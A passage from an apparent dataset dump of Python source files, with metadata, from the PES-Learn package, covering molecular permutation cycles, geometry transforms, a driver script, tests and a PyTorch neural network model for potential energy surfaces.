range(len(perm))}\n cycles = []\n\n while pi:\n elem0 = next(iter(pi)) # arbitrary starting element\n this_elem = pi[elem0]\n next_item = pi[this_elem]\n\n cycle = []\n while True:\n cycle.append(this_elem)\n del pi[this_elem]\n this_elem = next_item\n if next_item in pi:\n next_item = pi[next_item]\n else:\n break\n cycles.append(cycle[::-1])\n\n # only save cycles of size 2 and larger\n cycles[:] = [cyc for cyc in cycles if len(cyc) > 1]\n return cycles\n\n\ndef generate_bond_indices(natoms):\n \"\"\"\n natoms: int\n The number of atoms\n Finds the array of bond indices of the upper triangle of an interatomic distance matrix, in column wise order\n ( or equivalently, lower triangle of interatomic distance matrix in row wise order):\n [[0,1], [0,2], [1,2], [0,3], [1,3], [2,3], ...,[0, natom], ...,[natom-1, natom]]\n \"\"\" \n # initialize j as the number of atoms\n j = natoms - 1\n # now loop backward until you generate all bond indices \n bond_indices = []\n while j > 0:\n i = j - 1\n while i >= 0:\n new = [i, j]\n bond_indices.insert(0, new)\n i -= 1\n j -= 1 \n return bond_indices\n\ndef molecular_cycles(atomtype_vector):\n \"\"\"\n Finds the complete set of cycles that may act on a molecular system.\n Given an atomtype vector, containing the number of each atom:\n 1. generate the permutations of each atom\n 2. generate the cycles of each atom\n 3. adjust the indices to be nonoverlapping, so that each atom has a unique set of indices.\n For example, For an A2BC system, the indices may be assigned as follows: A 0,1; B 2; C 3; \n while the methods generate_permutations and find_cycles index from 0 for every atom, so we adjust the indices of every atom appropriately\n \"\"\"\n permutations_by_atom = [] \n for atom in atomtype_vector:\n # add the set of permutations for each atom type to permutations_by_atom\n permutations_by_atom.append(generate_permutations(atom)) # an array of permutations is added for atom type X\n cycles_by_atom = [] \n # each atom has a set of permutations, saved in permutations_by_atom \n for i, perms in enumerate(permutations_by_atom):\n cycles = []\n # find the cycles of each permutation and append to cycles, then append cycles to cycles_by_atom\n for perm in perms:\n cyc = find_cycles(perm)\n if cyc: # dont add empty cycles (identity permutation)\n cycles.append(cyc)\n cycles_by_atom.append(cycles)\n # now update the indices of the second atom through the last atom since they are currently indexed from zero\n # to do this we need to know the number of previous atoms, num_prev_atoms\n atomidx = 0\n num_prev_atoms = 0\n for atom in cycles_by_atom[1:]:\n num_prev_atoms += atomtype_vector[atomidx]\n for cycle in atom:\n for subcycle in cycle: # some cycles are composed of two or more subcycles (12)(34) etc.\n for i, idx in enumerate(subcycle): \n subcycle[i] = idx + num_prev_atoms\n atomidx += 1\n return cycles_by_atom\n\n\ndef permute_bond(bond, cycle):\n \"\"\"\n Permutes a bond inidice if the bond indice is affected by the permutation cycle.\n There is certainly a better way to code this. Yikes.\n \"\"\"\n count0 = 0\n count1 = 0\n # if the bond indice matches the cycle indice, set the bond indice equal to the next indice in the cycle\n # we count so we dont change a bond indice more than once.\n # If the cycle indice is at the end of the list, the bond indice should become the first element of the list since thats how cycles work.\n # theres probably a better way to have a list go back to the beginning\n for i, idx in enumerate(cycle):\n if (bond[0] == idx) and (count0 == 0):\n try:\n bond[0] = cycle[i+1]\n except:\n bond[0] = cycle[0]\n count0 += 1\n\n if (bond[1] == idx) and (count1 == 0):\n try:\n bond[1] = cycle[i+1]\n except:\n bond[1] = cycle[0]\n count1 += 1\n # sort if the permutation messed up the order. if you convert 1,2 to 2,1, for example \n bond.sort()\n return bond \n \ndef permute_bond_indices(atomtype_vector):\n \"\"\"\n Permutes the set of bond indices of a molecule according to the complete set of valid molecular permutation cycles\n atomtype_vector: array-like\n A vector of the number of each atoms, the length is the total number of atoms.\n An A3B8C system would be [3, 8, 1]\n Returns many sets permuted bond indices, the number of which equal to the number of cycles\n \"\"\"\n natoms = sum(atomtype_vector) \n bond_indices = generate_bond_indices(natoms) \n cycles_by_atom = molecular_cycles(atomtype_vector)\n \n bond_indice_permutations = [] # interatomic distance matrix permutations\n for atom in cycles_by_atom:\n for cycle in atom:\n tmp_bond_indices = copy.deepcopy(bond_indices) # need a deep copy, list of lists\n for subcycle in cycle:\n for i, bond in enumerate(tmp_bond_indices):\n tmp_bond_indices[i] = permute_bond(bond, subcycle)\n bond_indice_permutations.append(tmp_bond_indices) \n\n return bond_indice_permutations \n\ndef induced_permutations(atomtype_vector, bond_indice_permutations):\n \"\"\"\n Given the original bond indices list [[0,1],[0,2],[1,2]...] and a permutation of this bond indices list,\n find the permutation vector that maps the original to the permuted list. \n Do this for all permutations of the bond indices list. \n Result: The complete set induced interatomic distance matrix permutatations caused by the molecular permutation cycles \n \"\"\"\n natoms = sum(atomtype_vector) \n bond_indices = generate_bond_indices(natoms) \n \n induced_perms = [] \n for bip in bond_indice_permutations:\n perm = []\n for bond1 in bond_indices:\n for i, bond2 in enumerate(bip):\n if bond1 == bond2:\n perm.append(i)\n cycle = find_cycles(perm) \n induced_perms.append(cycle)\n return induced_perms\n \n\ndef write_singular_input(natoms, induced_perms):\n # Singular doesnt tolerate 0 indexing, so we add 1 to every element\n for cycle in induced_perms:\n for subcycle in cycle:\n for i in range(len(subcycle)):\n subcycle[i] += 1\n\n # create interatom distance variables\n A = []\n nbonds = int((natoms**2 - natoms) / 2)\n for i in range(1,nbonds+1):\n A.append(\"x\"+str(i))\n\n operators = ''\n count = 0\n for cycle in induced_perms:\n if count == 0:\n operators += 'list'\n else: \n operators += ',list'\n count += 1\n\n if len(cycle) > 1:\n operators += '('\n for subcycle in cycle:\n operators += 'list'\n operators += str(tuple(subcycle))\n # add comma except at end\n if subcycle != cycle[-1]:\n operators += ','\n operators += ')'\n else:\n if len(cycle) == 1:\n operators += '(list' + str(tuple(cycle[0])) + ')'\n\n line1 = \"LIB \\\"finvar.lib\\\";\\n\" \n line2 = \"ring R=0,({}),dp;\\n\".format(\",\".join(map(str,A)))\n line3 = \"def GEN=list({});\\n\".format(operators)\n line4 = \"matrix G = invariant_algebra_perm(GEN,0);\\n\" \n line5 = \"G;\"\n return (line1 + line2 + line3 + line4 + line5)\n\n\ndef atom_combinations(N):\n \"\"\"\n Generates the combinations of atom numbers for a molecular system with total number of atoms equal to N\n \"\"\"\n atomindices = []\n for i in range(1,N+1):\n atomindices.append(i)\n combos = [] \n for i in range(1, N+1):\n for combo in it.combinations_with_replacement(atomindices, i):\n if sum(combo) == N: \n combos.append(list(combo))\n return combos\n\n# use this to test. vector should be in same order as axis of interatomic distances. i.e., if columns are indexed by H H H C C O, vector should be [3,2,1]\natomtype_vector = [3]\nbond_indice_permutations = permute_bond_indices(atomtype_vector)\nIP = induced_permutations(atomtype_vector, bond_indice_permutations)\nsingular = write_singular_input(sum(atomtype_vector), IP)\nprint(\"Here is your Singular input file. Install Singular, copy paste text into a file, and run with 'Singular (inputfilename)'\\n\\n\")\nprint(singular)\n" }, { "alpha_fraction": 0.6633216142654419, "alphanum_fraction": 0.6643251180648804, "avg_line_length": 33.96491241455078, "blob_id": "bd21c1fda336ecb8f068f11ad3a3f7cc934a72c4", "content_id": "313b1240d9c9d416826596de98c2ddeb9578af2e", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1993, "license_type": "permissive", "max_line_length": 120, "num_lines": 57, "path": "/peslearn/driver.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nDriver for PES-Learn\n\"\"\"\nimport timeit\nimport sys\nimport os\nimport json\nfrom six.moves import input\nfrom collections import OrderedDict\nimport peslearn\nimport numpy as np\nimport pandas as pd\n\nwith open('input.dat', 'r') as f:\n input_string = f.read()\n\ninput_obj = peslearn.InputProcessor(input_string)\n\nif input_obj.keywords['mode'] == None:\n text = input(\"Do you want to 'generate' data, 'parse' data, or 'learn'?\")\n text = text.strip()\n\nelse:\n text = input_obj.keywords['mode']\n\nstart = timeit.default_timer()\n\nif text == 'generate' or text == 'g':\n mol = peslearn.datagen.Molecule(input_obj.zmat_string)\n config = peslearn.datagen.ConfigurationSpace(mol, input_obj)\n template_obj = peslearn.datagen.Template(\"./template.dat\")\n config.generate_PES(template_obj)\n print(\"Data generation finished in {} seconds\".format(round((timeit.default_timer() - start),2)))\n\nif text == 'parse' or text == 'p':\n mol = peslearn.datagen.Molecule(input_obj.zmat_string)\n peslearn.utils.parsing_helper.parse(input_obj, mol)\n\nif text == 'learn' or text == 'l':\n if input_obj.keywords['use_pips'] == 'true':\n mol = peslearn.datagen.Molecule(input_obj.zmat_string)\n if input_obj.keywords[\"ml_model\"] == 'gp':\n if input_obj.keywords['use_pips'] == 'true':\n gp = peslearn.ml.GaussianProcess(input_obj.keywords[\"pes_name\"], input_obj, molecule_type=mol.molecule_type)\n else:\n gp = peslearn.ml.GaussianProcess(input_obj.keywords[\"pes_name\"], input_obj)\n gp.optimize_model()\n\n if input_obj.keywords[\"ml_model\"] == 'nn':\n if input_obj.keywords['use_pips'] == 'true':\n nn = peslearn.ml.NeuralNetwork(input_obj.keywords[\"pes_name\"], input_obj, molecule_type=mol.molecule_type)\n else:\n nn = peslearn.ml.NeuralNetwork(input_obj.keywords[\"pes_name\"], input_obj)\n nn.optimize_model()\n \nstop = timeit.default_timer()\nprint(\"Total run time: {} seconds\".format(round(stop - start,2)))\n" }, { "alpha_fraction": 0.7796609997749329, "alphanum_fraction": 0.7796609997749329, "avg_line_length": 21.125, "blob_id": "3e1e82b470886f033f2dbde4ac5f57e8496987f3", "content_id": "9eb5a4f94113774d760a460bb721278f8b5ec577", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "permissive", "max_line_length": 43, "num_lines": 8, "path": "/peslearn/__init__.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "from . import datagen\nfrom . import ml\nfrom . import utils\nfrom . import lib\nfrom . import input_processor\nfrom . import constants \n\nfrom .input_processor import InputProcessor\n" }, { "alpha_fraction": 0.6257197856903076, "alphanum_fraction": 0.6641075015068054, "avg_line_length": 23.809524536132812, "blob_id": "31222410ba07a50ed789094047a14c0f26172133", "content_id": "8c7d1d119021861a41b4be2f0335b5d9012c7153", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 521, "license_type": "permissive", "max_line_length": 62, "num_lines": 21, "path": "/tests/test_input_processor.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest the TemplateProcessor class methods\n\"\"\"\n\nimport peslearn\nimport pytest\n\npath = 'tests/datafiles/input_zmat_1'\nwith open(path, 'r') as f:\n input_string = f.read()\n\ninput_object = peslearn.InputProcessor(input_string)\n\nmol = peslearn.datagen.Molecule(input_object.zmat_string)\n\ndef test_extract_intcos_ranges():\n input_object.extract_intcos_ranges()\n x = input_object.intcos_ranges \n y = [[0.7, 1.4, 8],[0.5, 1.8, 4.0],[1.0],[1],[-1],[180.0]]\n for key, value in x.items():\n assert value in y\n" }, { "alpha_fraction": 0.6112151145935059, "alphanum_fraction": 0.6334019899368286, "avg_line_length": 39.44696807861328, "blob_id": "d22b37868cd630849bfeb0b86f76b6e81808281a", "content_id": "a8d83faff41d8ed2418fb9bd8da423801bf754fc", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10682, "license_type": "permissive", "max_line_length": 138, "num_lines": 264, "path": "/peslearn/utils/geometry_transform_helper.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nVarious functions for molecular geometry transformations\n\"\"\"\nimport math\nimport numpy as np\nimport pandas as pd\nimport re\nimport os\nfrom itertools import combinations\nfrom .regex import xyz_block_regex,maybe\nfrom ..constants import deg2rad, rad2deg\nimport collections\n\ndef get_interatom_distances(cart):\n n = len(cart)\n matrix = np.zeros((n,n))\n for i,j in combinations(range(len(cart)),2):\n R = np.linalg.norm(cart[i]-cart[j])\n #create lower triangle matrix\n matrix[j,i] = R\n return matrix\n\ndef vectorized_unit_vector(coord_pairs):\n \"\"\"\n Finds all unit vectors between a series of coordinate pairs\n \"\"\"\n # First split arrays along pairs of atom coordinates between which unit vectors will be computed\n split = np.split(coord_pairs, 2, 1)\n a, b = np.squeeze(split[0]), np.squeeze(split[1])\n # compute unit vectors between points \n #einsum may be faster than linalg?? https://stackoverflow.com/questions/7741878/how-to-apply-numpy-linalg-norm-to-each-row-of-a-matrix\n tmp = b - a\n #norms = np.linalg.norm(tmp, axis=1).reshape(-1,1)\n norms = np.sqrt(np.einsum('ij,ij->i', tmp, tmp)).reshape(-1,1)\n unit_vecs = tmp[:] / norms\n return unit_vecs\n\ndef vectorized_unit_cross_product(uvec1, uvec2):\n \"\"\"\n Returns all cross products between every pair of unit vectors in uvec1 and uvec2\n \"\"\"\n #products = np.cross(uvec1, uvec2)\n products = np.cross(np.round(uvec1,12), np.round(uvec2,12))\n # If cross product is zero, it is due to co-linear atoms\n #print(np.all(np.isclose(products, np.zeros_like(products)), axis=1))\n #colinear_atoms_bool = np.all(np.isclose(products, np.zeros_like(products)), axis=1)\n #if np.any(np.all(np.isclose(products, np.zeros_like(products)), axis=1)):\n # print('co-linear atoms detected')\n #norms = np.linalg.norm(products, axis=1).reshape(-1,1)\n norms = np.sqrt(np.einsum('ij,ij->i', products, products)).reshape(-1,1)\n unit_vecs = products[:] / norms\n return unit_vecs\n\ndef vectorized_bond_vector(coords):\n \"\"\"\n Compute vector of bond in local axes of internal coordinates for all internal coordinates.\n coords is an array of bond, angle, dihedral values for a particular atom\n \"\"\"\n x = coords[:,0] * np.sin(coords[:,1]) * np.sin(coords[:,2])\n y = coords[:,0] * np.sin(coords[:,1]) * np.cos(coords[:,2])\n z = coords[:,0] * np.cos(coords[:,1])\n return np.array([x,y,z]).T\n\ndef vectorized_local_axes(three_atoms_coords):\n \"\"\"\n Takes as an argument a Nx3x3 block of reference atom coordinates to construct N local axes systems (Nx3x3)\n \"\"\"\n u12 = vectorized_unit_vector(three_atoms_coords[:, [0,1], :])\n u23 = vectorized_unit_vector(three_atoms_coords[:, [1,2], :])\n if np.any(np.einsum('ij,ij->i', u12,u23)) > 1.0:\n print(\"co-linear atoms detected\")\n u23_x_u12 = vectorized_unit_cross_product(u23, u12)\n u12_x_u23_x_u12 = vectorized_unit_cross_product(u12, u23_x_u12)\n z = u12\n y = u12_x_u23_x_u12\n x = vectorized_unit_cross_product(y, z)\n local_axes = np.transpose(np.array([x, y, z]), (1,0,2))\n return local_axes\n\ndef vectorized_zmat2xyz(intcos, zmat_indices, permutation_vector, natoms):\n \"\"\"\n Takes array of internal coordinates, creates 3d cartesian coordinate block of all Cartesian coordinates\n\n Parameters\n ---------\n intcos : arr\n A NumPy array of shape (n_geoms, n_internal_coords) containing a series of internal coordinate definitions\n zmat_indices : arr\n A NumPy array of shape (n_internal_coords) containing a series of ZMAT connectivity indices (NOT zero-indexed.)\n permutation_vector : arr\n A NumPy array of shape (n_atoms) describing how to permute atom order to standard order \n natoms : int\n The number of atoms (including dummy atoms)\n\n Returns \n ---------\n cart : arr\n A NumPy array of all Cartesian coordinates corresponding to internal coordinates. \n Has shape (n_geoms, n_atoms, 3), i.e., it is a list of 2d Cartesian coordinate blocks.\n Cartesian coordinates of atoms are then permuted according to the permutation_vector.\n In PES-Learn, this is done such that the element order is most common atom to least common, \n with an alphabetical tiebreaker. \n Example: C C H H H O O would be transformed to --> H H H C C O O\n \"\"\"\n zmat_indices = zmat_indices - 1\n # Convert all angular coordinates (which are in degrees) into radians \n angular_coord_indices = [i for i in range(2,intcos.shape[1], 3)] + [i for i in range(4,intcos.shape[1] ,3)]\n intcos[:,angular_coord_indices] *= deg2rad\n # Create Cartesians zero array\n cart = np.zeros((intcos.shape[0],natoms,3))\n # Assign Cartesian coordinates of first three atoms: Atom0: origin. Atom1:x=0,y=0,z=r1. Atom2:x=0, y=r2*sin(a1), z=complicated\n cart[:,1,2] = intcos[:,0]\n cart[:,2,1] = intcos[:,1]*np.sin(intcos[:,2])\n cart[:,2,2] = cart[:,zmat_indices[1],2] + (1 - 2 * float(zmat_indices[1]==1))*intcos[:,1]*np.cos(intcos[:,2])\n\n # Assign Cartesian coordinates of all additional atoms\n j = 3\n for i in range(3, natoms):\n # Pass the Cartesian coordinates of 3 reference atoms for all displacements at once\n local_axes = vectorized_local_axes(cart[:, [zmat_indices[j], zmat_indices[j+1], zmat_indices[j+2]], :])\n bond_vectors = vectorized_bond_vector(intcos[:, [j, j+1, j+2]] )\n disp_vectors = np.einsum('...j, ...jk->...k', bond_vectors, local_axes)\n newcart = cart[:, zmat_indices[j], :] + disp_vectors\n cart[:,i,:] = newcart\n j += 3\n intcos[:,angular_coord_indices] *= rad2deg\n # Permute to standard order (most common elements first, alphabetical tiebreaker)\n p = permutation_vector\n return cart[:,p,:]\n\n\n\ndef unit_vector(coords1, coords2):\n \"\"\"\n Calculate the unit vector between two cartesian coordinates\n \"\"\"\n distance = np.linalg.norm(coords2 - coords1)\n unit_vec = [0.0 for p in range(3)]\n for p in range(3):\n unit_vec[p] = (coords2[p] - coords1[p]) / distance \n return unit_vec\n\ndef unit_cross_product(uvec1, uvec2):\n \"\"\"\n Returns unit cross product between two unit vectors\n Ensures the result is itself a unit vector\n \"\"\"\n cos = np.dot(uvec1, uvec2)\n sin = math.sqrt(1 - cos**2)\n # if the number of atoms is > 3 and there are 3 colinear atoms this will fail\n csc = sin**-1\n return np.cross(uvec1, uvec2) * csc\n\n\ndef get_local_axes(coords1, coords2, coords3):\n u12 = unit_vector(coords1, coords2)\n u23 = unit_vector(coords2, coords3)\n #if (abs(np.dot(u12, u23)) >= 1.0):\n #print('\\nError: Co-linear atoms in an internal coordinate definition')\n u23_x_u12 = unit_cross_product(u23, u12)\n u12_x_u23_x_u12 = unit_cross_product(u12, u23_x_u12)\n z = u12\n y = u12_x_u23_x_u12\n x = unit_cross_product(y, z)\n local_axes = np.array([x, y, z])\n return local_axes\n\n# calculate vector of bond in local axes of internal coordinates\ndef get_bond_vector(r, a, d):\n x = r * math.sin(a) * math.sin(d)\n y = r * math.sin(a) * math.cos(d)\n z = r * math.cos(a)\n bond_vector = np.array([x, y, z])\n return bond_vector\n\n\ndef load_cartesian_dataset(xyz_path):\n \"\"\"\n Loads a cartesian dataset with energies on their own line and with standard cartesian coordinates.\n Reorganizes atoms into standard order (most common elements first, alphabetical tiebreaker)\n \"\"\"\n print(\"Loading Cartesian dataset: {}\".format(xyz_path))\n xyz_re = xyz_block_regex\n with open(xyz_path) as f:\n data = ''\n # remove trailing whitespace\n for line in f:\n line = line.rstrip()\n data += line + '\\n'\n # extract energy,geometry pairs\n #data_regex = \"\\s*-?\\d+\\.\\d+\\s*\\n\" + xyz_re\n #data_regex = maybe(\"\\d\\d?\\n\") + \"\\s*-?\\d+\\.\\d+\\s*\\n\" + xyz_re\n data_regex = maybe(\"\\d+\\n\") + \"\\s*-?\\d+\\.\\d+\\s*\\n\" + xyz_re\n datablock = re.findall(data_regex, data)\n for i in range(len(datablock)):\n datablock[i] = list(filter(None, datablock[i].split('\\n')))\n energies = [] \n for datapoint in datablock:\n # check if atom numbers are used, energy line\n if datapoint[0].isdigit():\n a = datapoint.pop(0)\n e = datapoint.pop(0)\n else:\n e = datapoint.pop(0)\n energies.append(e)\n geoms = datablock\n # find atom labels\n sample = geoms[0]\n atom_labels = [re.findall('\\w+', s)[0] for s in sample]\n natoms = len(atom_labels)\n # convert atom labels to standard order (most common element first, alphabetical tiebreaker)\n sorted_atom_counts = collections.Counter(atom_labels).most_common()\n sorted_atom_counts = sorted(sorted_atom_counts, key = lambda x: (-x[1], x[0]))\n sorted_atom_labels = []\n for tup in sorted_atom_counts:\n for i in range(tup[1]):\n sorted_atom_labels.append(tup[0])\n # find the permutation vector which maps unsorted atom labels to standard order atom labels\n p = []\n for i,j in enumerate(sorted_atom_labels):\n for k,l in enumerate(atom_labels):\n if j == l:\n p.append(k)\n atom_labels[k] = 'done'\n continue\n # permute all xyz geometries to standard order \n for g in range(len(geoms)):\n geoms[g] = [geoms[g][i] for i in p]\n\n # write new xyz file with standard order\n #with open('std_' + xyz_path, 'w+') as f:\n # for i in range(len(energies)):\n # f.write(energies[i] +'\\n')\n # for j in range(natoms):\n # f.write(geoms[i][j] +'\\n')\n\n # remove everything from XYZs except floats and convert to numpy arrays\n for i,geom in enumerate(geoms):\n for j,string in enumerate(geom):\n string = string.split()\n del string[0] # remove atom label\n geom[j] = np.asarray(string, dtype=np.float64)\n \n # convert to interatomic distances\n final_geoms = []\n for i in geoms:\n idm = get_interatom_distances(i)\n idm = idm[np.tril_indices(idm.shape[0],-1)]\n final_geoms.append(idm)\n \n final_geoms = np.asarray(final_geoms)\n energies = np.asarray(energies, dtype=np.float64)\n n_interatomics = int(0.5 * (natoms * natoms - natoms))\n bond_columns = []\n for i in range(n_interatomics):\n bond_columns.append(\"r%d\" % (i))\n DF = pd.DataFrame(data=final_geoms, columns=bond_columns)\n DF['E'] = energies\n\n # remove suffix of xyz path if it exists\n finalpath = xyz_path.rsplit(\".\",1)[0]\n finalpath = os.path.splitext(xyz_path)[0]\n DF.to_csv(finalpath + '_interatomics.dat',index=False, float_format='%12.10f')\n return DF\n\n\n\n\n" }, { "alpha_fraction": 0.6907216310501099, "alphanum_fraction": 0.7268041372299194, "avg_line_length": 38, "blob_id": "21b3c3f31af964525fb3735713c664cea9b9f386", "content_id": "ed3fef338168cdd3fdf0475da4a15c318b92edf0", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 194, "license_type": "permissive", "max_line_length": 101, "num_lines": 5, "path": "/1_Tutorials/1_water_pes_api/model3_data/loadpt.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import torch\n\nnn_model = torch.load(\"/home/dehui2/test/PES-Learn/1_Tutorials/1_water_pes_api/model3_data/model.pt\")\nout = nn_model(torch.tensor([3, 4, 5], dtype=torch.long))\nprint(\"Hello world\")" }, { "alpha_fraction": 0.8153846263885498, "alphanum_fraction": 0.8153846263885498, "avg_line_length": 27.66666603088379, "blob_id": "e875aa18d09b1447751500f5fae8b08ea41cea08", "content_id": "89bbf555a0b1d9591997cd8f10d4097570c67e63", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "permissive", "max_line_length": 51, "num_lines": 9, "path": "/peslearn/datagen/__init__.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "from . import configuration_space\nfrom . import molecule \nfrom . import template\nfrom . import outputfile\n\nfrom .configuration_space import ConfigurationSpace\nfrom .molecule import Molecule\nfrom .template import Template\nfrom .outputfile import OutputFile\n\n\n" }, { "alpha_fraction": 0.5457493662834167, "alphanum_fraction": 0.559836208820343, "avg_line_length": 52.68309783935547, "blob_id": "80195d32673c2ff3ea9a2b683f170dfb4750149f", "content_id": "fd01fadbafca498ebae958bd49af58c10921a171", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30525, "license_type": "permissive", "max_line_length": 225, "num_lines": 568, "path": "/peslearn/ml/neural_network.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport numpy as np\nimport pandas as pd\nimport os\nfrom collections import OrderedDict\nimport re\nimport copy\n\nfrom .model import Model\nfrom .data_sampler import DataSampler \nfrom ..constants import hartree2cm, package_directory, nn_convenience_function\nfrom .preprocessing_helper import morse, interatomics_to_fundinvar, degree_reduce, general_scaler\nfrom ..utils.printing_helper import hyperopt_complete\nfrom sklearn.model_selection import train_test_split \nfrom hyperopt import fmin, tpe, hp, STATUS_OK, STATUS_FAIL, Trials, space_eval\nfrom .preprocessing_helper import sort_architectures\n\n\ntorch.set_printoptions(precision=15)\n\nclass NeuralNetwork(Model):\n \"\"\"\n Constructs a Neural Network Model using PyTorch\n \"\"\"\n def __init__(self, dataset_path, input_obj, molecule_type=None, molecule=None, train_path=None, test_path=None, valid_path=None):\n super().__init__(dataset_path, input_obj, molecule_type, molecule, train_path, test_path, valid_path)\n self.trial_layers = self.input_obj.keywords['nas_trial_layers']\n self.set_default_hyperparameters()\n \n if self.input_obj.keywords['validation_points']:\n self.nvalid = self.input_obj.keywords['validation_points']\n if (self.nvalid + self.ntrain + 1) > self.n_datapoints:\n raise Exception(\"Error: User-specified training set size and validation set size exceeds the size of the dataset.\")\n else:\n self.nvalid = round((self.n_datapoints - self.ntrain) / 2)\n \n if self.pip:\n if molecule_type:\n path = os.path.join(package_directory, \"lib\", molecule_type, \"output\")\n self.inp_dim = len(open(path).readlines())\n if molecule:\n path = os.path.join(package_directory, \"lib\", molecule.molecule_type, \"output\")\n self.inp_dim = len(open(path).readlines())\n else:\n self.inp_dim = self.raw_X.shape[1]\n\n def set_default_hyperparameters(self, nn_search_space=1):\n \"\"\"\n Set default hyperparameter space. If none is provided, default is used.\n\n Parameters\n ----------\n nn_search_space : int\n Which tier of default hyperparameter search spaces to use. Neural networks have too many hyperparameter configurations to search across, \n so this option reduces the number of variable hyperparameters to search over. Generally, larger integer => more hyperparameters, and more iterations of hp_maxit are recommended.\n \"\"\"\n if nn_search_space == 1:\n self.hyperparameter_space = {\n 'scale_X': hp.choice('scale_X',\n [\n {'scale_X': 'mm11',\n 'activation': hp.choice('activ2', ['tanh'])},\n {'scale_X': 'std',\n 'activation': hp.choice('activ3', ['tanh'])},\n ]),\n 'scale_y': hp.choice('scale_y', ['std', 'mm01', 'mm11']),}\n # TODO make more expansive search spaces, benchmark them, expose them as input options\n #elif nn_search_space == 2:\n #elif nn_search_space == 3:\n else:\n raise Exception(\"Invalid search space specification\")\n\n # Standard geometry transformations, always use these.\n if self.input_obj.keywords['pes_format'] == 'interatomics':\n self.set_hyperparameter('morse_transform', hp.choice('morse_transform',[{'morse': True,'morse_alpha': hp.quniform('morse_alpha', 1, 2, 0.1)},{'morse': False}]))\n else:\n self.set_hyperparameter('morse_transform', hp.choice('morse_transform',[{'morse': False}]))\n if self.pip:\n val = hp.choice('pip',[{'pip': True,'degree_reduction': hp.choice('degree_reduction', [True,False])}])\n self.set_hyperparameter('pip', val)\n else:\n self.set_hyperparameter('pip', hp.choice('pip', [{'pip': False}]))\n\n def optimize_model(self):\n if not self.input_obj.keywords['validation_points']:\n print(\"Number of validation points not specified. Splitting test set in half --> 50% test, 50% validation\")\n print(\"Training with {} points. Validating with {} points. Full dataset contains {} points.\".format(self.ntrain, self.nvalid, self.n_datapoints))\n print(\"Using {} training set point sampling.\".format(self.sampler))\n print(\"Errors are root-mean-square error in wavenumbers (cm-1)\")\n print(\"\\nPerforming neural architecture search...\\n\")\n best_hlayers = self.neural_architecture_search(trial_layers = self.trial_layers)\n print(\"\\nNeural architecture search complete. Best hidden layer structures: {}\\n\".format(best_hlayers))\n print(\"Beginning hyperparameter optimization...\")\n print(\"Trying {} combinations of hyperparameters\".format(self.hp_maxit))\n self.set_hyperparameter('layers', hp.choice('layers', best_hlayers))\n self.hyperopt_trials = Trials()\n self.itercount = 1\n if self.input_obj.keywords['rseed']:\n rstate = np.random.RandomState(self.input_obj.keywords['rseed'])\n else:\n rstate = None\n best = fmin(self.hyperopt_model,\n space=self.hyperparameter_space,\n algo=tpe.suggest,\n max_evals=self.hp_maxit*2,\n rstate=rstate, \n show_progressbar=False,\n trials=self.hyperopt_trials)\n hyperopt_complete()\n print(\"Best performing hyperparameters are:\")\n final = space_eval(self.hyperparameter_space, best)\n print(str(sorted(final.items())))\n self.optimal_hyperparameters = dict(final)\n print(\"Optimizing learning rate...\")\n \n if self.input_obj.keywords['nn_precision'] == 64:\n precision = 64\n elif self.input_obj.keywords['nn_precision'] == 32:\n precision = 32\n else: \n precision = 32\n learning_rates = [1.0, 0.8, 0.6, 0.5, 0.4, 0.2]\n val_errors = []\n for i in learning_rates:\n self.optimal_hyperparameters['lr'] = i\n test_error, val_error = self.build_model(self.optimal_hyperparameters, maxit=5000, val_freq=10, es_patience=5, opt='lbfgs', tol=0.5, decay=False, verbose=False, precision=precision)\n val_errors.append(val_error)\n best_lr = learning_rates[np.argsort(val_errors)[0]]\n self.optimal_hyperparameters['lr'] = best_lr\n print(\"Fine-tuning final model...\")\n model, test_error, val_error, full_error = self.build_model(self.optimal_hyperparameters, maxit=5000, val_freq=1, es_patience=100, opt='lbfgs', tol=0.1, decay=True, verbose=True,precision=precision,return_model=True)\n performance = [test_error, val_error, full_error]\n print(\"Model optimization complete. Saving final model...\")\n self.save_model(self.optimal_hyperparameters, model, performance)\n\n def neural_architecture_search(self, trial_layers=None):\n \"\"\"\n Finds 'optimal' hidden layer structure. (i.e., tries both wide and deep homogenous hidden layer structures and finds the best 3 for follow-up hyperparameter optimization)\n \n Parameters\n ----------\n trial_layers : list\n A list of tuples describing the number of nodes in each hidden layer. Example: a 3-20-20-1 NN would be a tuple (20,20).\n \"\"\"\n if trial_layers == None:\n tmp_layers = [(16,), (16,16), (16,16,16), (16,16,16,16),\n (32,), (32,32), (32,32,32), (32,32,32,32),\n (64,), (64,64), (64,64,64), (64,64,64,64),\n (128,), (128,128), (128,128,128),\n (256,), (256,256)] \n else:\n tmp_layers = trial_layers\n self.nas_layers = sort_architectures(tmp_layers, self.inp_dim)\n self.nas_size = len(self.nas_layers)\n # force reliable set of hyperparameters\n params = {'morse_transform': {'morse':False},'scale_X':{'scale_X':'std', 'activation':'tanh'}, 'scale_y':'std'}\n if self.pip:\n params['pip'] = {'degree_reduction': False, 'pip': True} \n else:\n params['pip'] = {'degree_reduction': False, 'pip': False} \n test = []\n validation = []\n for i in self.nas_layers:\n params['layers'] = i\n print(\"Hidden layer structure: \", i)\n testerror, valid = self.build_model(params, maxit=300, val_freq=10, es_patience=2, opt='lbfgs', 